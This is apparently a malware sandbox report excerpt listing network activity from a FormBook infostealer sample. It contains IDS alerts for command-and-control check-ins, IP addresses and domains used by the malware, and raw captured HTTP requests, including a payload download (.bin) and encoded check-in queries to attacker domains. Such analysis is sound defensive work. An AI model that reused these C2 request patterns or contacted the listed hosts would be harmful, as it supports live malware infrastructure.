          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49850 -> 101.35.209.183:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49807 -> 13.248.169.48:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49806 -> 134.0.14.158:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49835 -> 46.30.211.38:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49827 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49855 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49829 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49831 -> 27.124.4.246:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49852 -> 154.23.178.231:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49801 -> 74.48.143.82:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49785 -> 208.91.197.39:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49857 -> 208.91.197.39:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49856 -> 208.91.197.39:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49784 -> 208.91.197.39:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49858 -> 208.91.197.39:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 208.91.197.39:80
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.optimismbank.xyz
          Source: unknownNetwork traffic detected: IP country count 10
          Source: Joe Sandbox ViewIP Address: 209.74.77.109 209.74.77.109
          Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
          Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49757 -> 122.201.127.17:443
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 02:55:43 GMTserver: Apacheset-cookie: __tad=1736564143.3375901; expires=Tue, 09-Jan-2035 02:55:43 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 02:55:46 GMTserver: Apacheset-cookie: __tad=1736564146.2518747; expires=Tue, 09-Jan-2035 02:55:46 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 02:55:48 GMTserver: Apacheset-cookie: __tad=1736564148.6182786; expires=Tue, 09-Jan-2035 02:55:48 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 03:00:09 GMTserver: Apacheset-cookie: __tad=1736564409.2393264; expires=Tue, 09-Jan-2035 03:00:09 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 03:00:11 GMTserver: Apacheset-cookie: __tad=1736564411.5059612; expires=Tue, 09-Jan-2035 03:00:11 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Sat, 11 Jan 2025 03:00:14 GMTserver: Apacheset-cookie: __tad=1736564414.1745252; expires=Tue, 09-Jan-2035 03:00:14 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 8f d3 30 10 3d 37 bf 62 94 3d 24 d5 b2 71 51 05 48 6d 1c 0e 48 48 20 0e 68 17 ce c8 eb 4c 1a ef 26 76 b0 a7 ed 56 ab fe 77 c6 69 f6 03 90 58 7c 49 3c 7e 6f e6 bd c9 38 65 4b 7d 57 25 65 8b aa e6 07 19 ea b0 ea 55 dd 36 05 a1 6e 4b 71 8a 24 65 d0 de 0c 04 74 18 50 a6 84 77 24 6e d4 4e 9d a2 29 04 af 65 2a 6e 82 68 8c dd a0 1f bc b1 24 8c 69 b0 e8 8d 2d 6e 42 5a 95 e2 84 7d 29 55 95 ec 94 07 8f b5 f1 a8 e9 47 67 ec 2d 48 c8 5a a2 61 25 c4 7e bf 2f 9e d4 89 a5 39 f4 e2 7d b6 4e 12 21 e0 0a 09 14 90 e9 d1 6d 09 5c 03 cb c5 02 7a a3 bd 0b a8 9d ad 03 90 03 bc 43 bd 25 64 e0 43 09 30 0d 50 8b f0 4c 39 0c de f5 26 70 4c 99 2e 40 e3 3c 04 d7 23 53 54 70 36 69 b6 56 93 71 96 8f bb ee 5a e9 db cb 29 55 3e 87 fb 64 b6 37 b6 76 fb a2 73 5a 45 54 e1 71 e8 94 c6 fc 37 4f e7 59 33 c8 8b 77 d9 7c 9d 1c 93 84 fc 21 32 59 65 20 f0 b5 ff 36 99 90 10 90 a6 4d fe 67 b5 57 d1 20 f3 67 b1 61 cd f0 75 d2 2c e1 e3 93 93 cf 57 ac 43 d5 f9 7d ef ac 21 c7 a1 cd 2a ca 0e 78 8c cc 47 56 32 9b 15 dc 04 9b 37 03 c8 8a b3 15 1b 64 3b f3 c7 38 bf cc 3c 86 6d 47 f1 fc 1e e2 7e 2a ec a3 ce 68 27 3b 3f 21 8a 9d 09 b1 d8 a7 7a 3d c2 74 87 ea c1 52 fe e4 6e 7e 3a fd bf 76 c5 32 23 21 ea 3e 02 63 75 9b a3 f7 63 c7 ff fe 0e 63 57 9f 8f 1c 1d 78 8a e1 da d5 dc 68 88 d8 8d 77 5b 5b af ce 5e 2f 5e eb e5 5b 38 02 a3 47 10 d3 a6 cb 30 a2 af 37 da 75 ce cb f4 ac 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 1d 8c 5c 99 d5 26 b0 fa c3 0a ac b3 b8 ce aa 52 41 eb b1 91 ff 9c df 38 09 cb ac fa d0 19 7d 0b 2d 7a 1c 07 d5 12 fa 52 28 be 38 9c 9f ab 58 37 b9 29 7b 24 4e cb 09 2f f0 e7 d6 ec 64 ca 15 b8 f3 6d 0a 3c 40 c4 44 99 2e d6 f0 fd f2 8b 7c a9 ea 9b 78 2f 1f 13 b3 f3 68 79 ec 40 fc 2b fc 02 65 0b a8 8a 1c 04 00 00 Data Ascii: TM0=7b=$qQHmHH hL&vVwiX|I<~o8eK}W%eU6nKq$etPw$nN)e*nh$i-nBZ})UGg-HZa%~/9}N!m\zC%dC0PL9&pL.@<#STp6iVqZ)U>d7vsZETq7OY3w|!2Ye 6MgW gau,WC}!*xGV27d;8<mG~*h';?!z=tRn~:v2#!>cuccWxhw[[^/^[8G07uWqbykY\&RA8}-zR(8X7){$N/dm<@D.|x/hy@+e
          Source: global trafficHTTP traffic detected: GET /BJuAryIbeCLh111.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: babalharra.com.auCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /98j3/?iS=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.optimismbank.xyzUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /r3zg/?Bi=zJ_w6yPG&iS=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.greenthub.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /n2c9/?iS=3x/7f4nzUvf4SsmqzFnTfg9SxMMmEiloZs8QEOaGeCkTK2Ae1JBrg2z7Qirl6WfPBEFIuXRetS7qNq3tJgV/JudJBWlXSOQ4g5lNoHOvpN8KebvqySaeOvo=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.laohub10.netUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
          Source: global trafficHTTP traffic detected: GET /uf7y/?iS=X8Xx4Xb3zOwIp/YkPeQkR0guwoAt7ELtmVzPPBr+rNKRcobOh5vjSVYUxnTRN3k+HcX7svN7WZWipHk078Y7lpE6s8+6fnJkBTwA9zJT+z2YULyhD3K67+Y=&Bi=zJ_w6yPG HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeHost: www.bankseedz.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
